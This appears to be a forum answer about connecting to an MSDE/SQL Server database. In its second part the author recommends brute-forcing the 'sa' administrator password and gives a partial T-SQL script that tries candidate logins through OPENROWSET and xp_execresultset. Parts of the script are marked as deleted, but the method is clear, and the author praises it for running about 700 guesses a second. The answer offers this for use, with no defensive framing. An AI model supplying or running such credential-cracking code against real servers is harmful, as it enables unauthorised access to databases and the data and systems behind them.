调试易

(1) You can connect to a remote server with Windows Authentication even if you are on a computer outside its domain/AD - provided that you have a computer inside the domain/AD to serve as a bridge. In fact, if you already have access to A, why can't you just RDP in and connect to MSDE via OSQL?(2) You are most likely right that the application is using SQL login to connect rather than relying on Windows Authentication. That would account for the fact that you have to use mixed mode in order for the application to connect. To hack the sa password, you can engage in a brute-force attack. If the server is fast enough and the password simple enough, it may not even take too long to crack it.To give you an idea, here is a script you can use to flesh out the attack vector:
declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_'
select @pwd_len = 8
select @username = 'sa'
while @i < @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N'select * from OPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=' + @username + N';pwd=' + @pwd + N''',''select @@version'')'
exec xp_execresultset @query, N'master'
--check for success
(code deleted)
-- increment the password
(code deleted)
end
The beauty of this piece of code is that you are using the power of the machine to hack itself. In one of the test carried out, I could get the script to test for 700 passwords a second.